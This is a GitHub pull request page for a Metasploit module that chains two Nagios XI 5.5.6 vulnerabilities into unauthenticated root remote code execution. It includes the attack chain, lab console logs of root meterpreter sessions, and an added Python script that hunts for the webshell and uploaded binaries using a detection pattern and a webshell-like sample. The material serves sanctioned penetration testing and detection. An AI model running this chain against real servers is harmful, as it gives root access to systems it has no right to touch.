
Add Nagios XI 5.5.6 Root Remote Code Execution Module #11987

Merged
merged 4 commits into from Jun 25, 2019

@yaumn
Contributor

commented Jun 17, 2019

Add Nagios XI 5.5.6 Root Remote Code Execution Module

This module exploits two vulnerabilities in Nagios 5.5.6:
  - CVE-2018-15708, which allows for unauthenticated remote code execution
  - CVE-2018-15710, which allows for local privilege escalation.
When combined, these two vulnerabilities give us a root reverse shell.

The exploit works as follows:
- A local HTTPS server is set up. When it is reached, this server responds with a payload.
- By crafting a malicious request, we make the target host send a request to our HTTPS server. Therefore, the local HTTPS server must be reachable from outside your private network (except if the Nagios server is in the same network as yours, obviously); this is what the RSRVHOST and RSRVPORT options are for. The malicious request allows for file upload. A PHP webshell and a meterpreter executable are uploaded.
- A command is executed thanks to the webshell. This command elevates privileges and runs the meterpreter executable, giving us a meterpreter session.

Verification

To test the exploit, I used Ubuntu 18.04 LTS x64 in a VM and I installed Nagios XI 5.5.6 from the official website (https://www.nagios.com/downloads/nagios-xi/older-releases/).

  • Start msfconsole
  • use exploit/linux/http/nagios_xi_root_rce
  • set RHOSTS IP
  • set RSRVHOST IP
  • exploit
  • Verify you get a root shell

Scenarios

msf5 > use exploit/linux/http/nagios_xi_root_rce 
msf5 exploit(linux/http/nagios_xi_root_rce) > set RHOSTS 192.168.0.57
RHOSTS => 192.168.0.57
msf5 exploit(linux/http/nagios_xi_root_rce) > set RSRVHOST 192.168.0.50
RSRVHOST => 192.168.0.50
msf5 exploit(linux/http/nagios_xi_root_rce) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.0.50:4444 
[*] Using URL: https://0.0.0.0:8080/yXgRPrO9L8zIt
[*] Local IP: https://192.168.0.50:8080/yXgRPrO9L8zIt
[*] Server started.
[*] webshell.php uploaded with success!
[*] Using URL: https://0.0.0.0:8080/oDRVURAY82YcT
[*] Local IP: https://192.168.0.50:8080/oDRVURAY82YcT
[*] Server started.
[*] meterpreter uploaded with success!
[*] Sending stage (985320 bytes) to 192.168.0.57
[*] Meterpreter session 1 opened (192.168.0.50:4444 -> 192.168.0.57:33162) at 2019-06-16 23:44:34 +0100
[+] Deleted /usr/local/nagvis/share/webshell.php
[+] Deleted /usr/local/nagvis/share/meterpreter
[!] This exploit may require manual cleanup of '/var/tmp/shell.nse' on the target
[*] Server stopped.

msf5 exploit(linux/http/nagios_xi_root_rce) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.0.57
OS           : Ubuntu 18.04 (Linux 4.18.0-21-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >
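The session output above names the artifacts this technique leaves on a compromised host: uploads under /usr/local/nagvis/share and the leftover /var/tmp/shell.nse. The following is an added defender-side hunt script, not part of this PR or the Metasploit module; the paths are taken from the session log, while the heuristics (ELF binary in the web root, PHP calling an exec primitive on request input) and the sample tree are my own constructed assumptions. Because the merged module randomises the uploaded filenames, the rules key on file properties rather than fixed names.

```python
import os
import re
import tempfile

# Paths come from the PR's session output; the merged module randomises the
# uploaded filenames, so the rules key on file properties rather than names.
NAGVIS_SHARE = "/usr/local/nagvis/share"
LEFTOVER = "/var/tmp/shell.nse"

# Heuristic (my own, not from the module): a PHP exec primitive fed directly
# from request input is the signature of a minimal webshell.
WEBSHELL_RE = re.compile(
    rb"\b(system|exec|passthru|shell_exec|popen)\s*\(\s*\$_(GET|POST|REQUEST)\b"
)

def hunt(share_dir=NAGVIS_SHARE, leftover=LEFTOVER):
    """Return (reason, path) findings for one Nagios XI host."""
    findings = []
    if os.path.exists(leftover):
        findings.append(("leftover privesc script", leftover))
    for root, _dirs, files in os.walk(share_dir):
        for name in files:
            path = os.path.join(root, name)
            try:
                with open(path, "rb") as fh:
                    head = fh.read(65536)
            except OSError:
                continue
            if head.startswith(b"\x7fELF"):
                findings.append(("ELF binary in web root", path))
            if name.endswith(".php") and WEBSHELL_RE.search(head):
                findings.append(("PHP exec on request input", path))
    return findings

def demo():
    """Constructed sample tree (not a real host) exercising every rule."""
    share = tempfile.mkdtemp()
    samples = {
        "index.php": b"<?php echo 'nagvis'; ?>",        # benign page
        "q3x9.php": b"passthru($_REQUEST['c'])",         # webshell-like fragment
        "k8d2": b"\x7fELF" + b"\0" * 60,                 # dropped binary header
    }
    for name, body in samples.items():
        with open(os.path.join(share, name), "wb") as fh:
            fh.write(body)
    leftover = os.path.join(share, "shell.nse")          # stands in for /var/tmp
    open(leftover, "wb").close()
    return sorted(reason for reason, _ in hunt(share, leftover))
```

Run `hunt()` with the defaults on a Nagios XI host to check the real paths; `demo()` only shows the rules firing on constructed data.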

@yaumn yaumn changed the title Add Nagios XI 5.5.6 Root Remote Code Execution exploit Add Nagios XI 5.5.6 Root Remote Code Execution Module Jun 18, 2019

@wchen-r7 wchen-r7 self-assigned this Jun 18, 2019

@wchen-r7

Contributor

commented Jun 25, 2019

Sorry for the wait. For some reason I ended up going down some silly path trying to install Nagios XI, but it turned out to be actually easy. Anyways, the module works fine for me:

msf5 exploit(linux/http/nagios_xi_root_rce) > check
[*] 172.16.135.129:443 - The target appears to be vulnerable.
msf5 exploit(linux/http/nagios_xi_root_rce) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.135.1:4444 
msf5 exploit(linux/http/nagios_xi_root_rce) > [*] Using URL: https://0.0.0.0:8080/0sSXoIkeTo2
[*] Local IP: https://192.168.0.21:8080/0sSXoIkeTo2
[*] Server started.
[*] webshell.php uploaded with success!
[*] Using URL: https://0.0.0.0:8080/1vmZQikrphTQHf6
[*] Local IP: https://192.168.0.21:8080/1vmZQikrphTQHf6
[*] Server started.
[*] meterpreter uploaded with success!
[*] Sending stage (985320 bytes) to 172.16.135.129
[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.129:58494) at 2019-06-24 23:58:00 -0500
[+] Deleted /usr/local/nagvis/share/webshell.php
[+] Deleted /usr/local/nagvis/share/meterpreter
[!] This exploit may require manual cleanup of '/var/tmp/shell.nse' on the target
[*] Server stopped.

msf5 exploit(linux/http/nagios_xi_root_rce) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                    Connection
  --  ----  ----                   -----------                                    ----------
  1         meterpreter x86/linux  uid=0, gid=0, euid=0, egid=0 @ 172.16.135.129  172.16.135.1:4444 -> 172.16.135.129:58494 (172.16.135.129)

msf5 exploit(linux/http/nagios_xi_root_rce) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > pwd
/usr/local/nagvis/share
meterpreter > 

But I'll do a little touch up here and there to clean up the code a little bit (don't worry, just minor stuff!). And then I will land this pull request. Thank you @yaumn. It's a really cool module! :-)

@yaumn

Contributor Author

commented Jun 25, 2019

No problem, thank you for your time!

@wchen-r7 wchen-r7 merged commit 8723775 into rapid7:master Jun 25, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
Metasploit Automation - Test Execution: Successfully completed all tests.
continuous-integration/travis-ci/pr: The Travis CI build passed

wchen-r7 added a commit that referenced this pull request Jun 25, 2019

@wchen-r7

Contributor

commented Jun 25, 2019

Release notes

This module exploits two vulnerabilities in Nagios 5.5.6:

  • CVE-2018-15708: which allows for unauthenticated remote code execution
  • CVE-2018-15710: which allows for local privilege escalation.

When combined, these two vulnerabilities give us a root reverse shell.

msjenkins-r7 added a commit that referenced this pull request Jun 25, 2019

@wchen-r7

Contributor

commented Jun 25, 2019

Some changes I made:

  • Module's filename changed to nagios_xi_magpie_debug.
  • Make the names of the files the exploit is uploading random.
  • Module documentation
  • Other cosmetic changes (like spacing)

@yaumn yaumn deleted the yaumn:nagios-xi-rce branch Jun 25, 2019
